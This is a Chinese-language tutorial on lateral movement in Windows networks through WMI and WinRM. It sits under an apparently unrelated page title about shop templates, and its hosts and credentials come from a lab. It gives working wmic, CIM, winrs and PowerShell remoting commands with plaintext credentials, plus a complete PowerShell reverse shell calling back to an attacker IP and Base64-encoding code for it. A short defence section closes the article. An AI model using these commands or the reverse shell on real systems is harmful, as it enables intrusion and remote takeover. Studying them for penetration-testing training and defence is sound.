商城网站前台模板免费下载营销推广网站
引言
在现代网络安全领域,横向移动(Lateral Movement)是攻击者从初始入侵点扩展至网络内部其他系统的重要手段。通过利用Windows操作系统内置的管理工具和技术,如Windows Management Instrumentation(WMI)和Windows Remote Management(WinRM),攻击者能够在目标网络中悄无声息地移动并提升权限。本文将深入探讨WMI和WinRM的工作原理、实现方式及其在横向移动中的具体应用,结合代码示例和实际场景,全面剖析这两种技术的攻击潜力与防御策略。
第一章:WMI技术基础
1.1 WMI概述
Windows Management Instrumentation(WMI)是微软开发的一种面向对象的管理框架,旨在为管理员和开发者提供自动化任务执行的能力。它通过提供对系统资源、硬件和软件的统一访问接口,成为Windows系统中不可或缺的一部分。WMI的核心功能包括查询系统信息、管理服务以及创建和管理进程。
WMI通过Win32_Process类的Create方法支持远程进程创建,这一特性使其成为横向移动的理想工具。通信层面,WMI依赖远程过程调用(RPC),默认使用135端口进行初始连接,随后在19152至65535的高端口范围内传输会话数据。
1.2 WMI的通信机制
WMI的远程访问基于分布式组件对象模型(DCOM),通过RPC协议实现跨主机通信。攻击者利用这一机制,可以在无需直接登录目标系统的情况下执行命令或启动进程。然而,成功的WMI操作需要目标主机的管理员权限,通常要求攻击者具备本地Administrators组成员的凭据或域用户权限。
1.3 WMI的横向移动潜力
WMI在横向移动中的应用主要体现在其隐蔽性和灵活性。传统的攻击工具可能触发安全软件的警报,而WMI作为系统内置组件,通常被视为合法操作,难以被检测。此外,WMI支持脚本化执行(如PowerShell),进一步提升了攻击的自动化程度。
第二章:通过WMIC实现横向移动
2.1 WMIC简介
WMIC(WMI Command-line)是WMI的命令行接口,尽管在Windows最新版本中已被弃用,但其历史上的广泛使用使其成为研究WMI攻击的经典案例。WMIC通过简单的命令行参数即可实现远程进程创建。
2.2 WMIC攻击示例
假设攻击者当前位于客户端机器CLIENT74,目标是服务器Files04(IP地址为192.168.50.73),并拥有域用户jen的凭据(密码为Nexus123!)。以下是使用WMIC启动远程计算器(calc)的步骤:
C:\Users\jeff>wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
执行结果显示:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{ProcessId = 752;ReturnValue = 0;
};
返回值为0表示进程创建成功,目标机器的任务管理器中将出现由jen用户运行的calc.exe进程。
2.3 会话隔离与进程特性
值得注意的是,自Windows Vista起引入的会话隔离机制使得系统进程和服务默认运行在会话0中。由于WMI提供程序主机(WMI Provider Host)作为系统服务运行,通过WMI创建的新进程同样位于会话0。这一特性限制了某些交互式进程的可见性,但在非交互式攻击场景中影响较小。
2.4 WMIC的局限性与弃用
尽管WMIC简单易用,但其命令行特性使其易于被日志记录和检测。此外,微软已逐步淘汰WMIC,转而推荐使用PowerShell,这促使攻击者转向更现代化的WMI实现方式。
第三章:通过PowerShell实现WMI攻击
3.1 PowerShell的优势
相比WMIC,PowerShell提供了更强大的脚本支持和更高的灵活性。通过PowerShell,攻击者可以构造复杂的WMI调用,实现从简单进程创建到完整反向Shell的多种攻击场景。
3.2 创建PSCredential对象
在PowerShell中执行WMI攻击的第一步是构造凭据对象。以下是创建jen用户凭据的代码:
$username = 'jen'
$password = 'Nexus123!'
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString
此代码将密码转换为安全字符串,并封装为PSCredential对象,用于后续认证。
3.3 建立CIM会话
PowerShell通过Common Information Model(CIM)管理WMI操作。以下是创建CIM会话的步骤:
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $options
$command = 'calc'
这里指定DCOM协议并连接目标IP(192.168.50.73),有效负载为启动计算器。
3.4 执行WMI调用
最后,通过Invoke-CimMethod命令执行远程进程创建:
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$command}
执行结果显示新进程ID(例如3712)和返回值为0,表明攻击成功。
3.5 从简单进程到反向Shell
为了提升攻击效果,可以将有效负载替换为PowerShell编写的反向Shell。以下是一个基础反向Shell代码:
$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
为避免特殊字符问题,使用Python将此代码编码为Base64:
import base64
payload = '$client = New-Object ...'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
运行后得到Base64编码的命令,替换$command变量并执行,最终在攻击者Kali机器的Netcat监听器(端口443)上获得Shell。
第四章:WinRM技术基础与应用
4.1 WinRM概述
Windows Remote Management(WinRM)是微软对WS-Management协议的实现,基于HTTP/HTTPS传输XML消息,默认使用5985(HTTP)和5986(HTTPS)端口。WinRM支持远程主机管理,是PowerShell远程处理和多种内置工具(如winrs)的核心组件。
4.2 通过WinRS实现横向移动
WinRS(Windows Remote Shell)是WinRM的命令行工具,要求目标主机上的用户属于Administrators或Remote Management Users组。以下是使用jen凭据远程执行命令的示例:
C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
FILES04
corp\jen
输出确认命令在目标主机Files04上成功执行。
4.3 WinRS与反向Shell
将命令替换为Base64编码的反向Shell后,攻击者可获得完整的远程控制:
C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD..."
Netcat监听器收到来自Files04的Shell,进一步验证了攻击成功。
4.4 PowerShell Remoting
PowerShell通过New-PSSession支持WinRM远程会话:
$credential = New-Object System.Management.Automation.PSCredential 'jen', (ConvertTo-SecureString 'Nexus123!' -AsPlaintext -Force)
New-PSSession -ComputerName 192.168.50.73 -Credential $credential
Enter-PSSession 1
进入会话后,可直接运行命令验证权限和主机名。
第五章:WMI与WinRM的对比与防御
5.1 技术对比
- 通信协议:WMI使用DCOM/RPC,WinRM基于HTTP/HTTPS。
- 端口:WMI(135+高端口),WinRM(5985/5986)。
- 隐蔽性:WMI更低调,WinRM易被网络流量检测。
- 灵活性:WinRM支持交互式会话,WMI更适合单次执行。
5.2 防御策略
- 限制权限:移除不必要的管理员权限,启用UAC。
- 网络隔离:限制135、5985、5986端口的访问。
- 日志监控:记录WMI和WinRM活动,检测异常进程创建。
- 禁用服务:在非必要主机上禁用WMI和WinRM。
结论
WMI和WinRM作为Windows管理工具,在横向移动中展现出强大的攻击潜力。通过WMIC、PowerShell和WinRS等工具,攻击者可以轻松实现远程进程创建和权限提升。理解这些技术的原理和实现方式,不仅有助于攻击模拟,也为防御设计提供了关键洞察。在日益复杂的网络威胁环境中,掌握WMI和WinRM的双刃剑特性至关重要。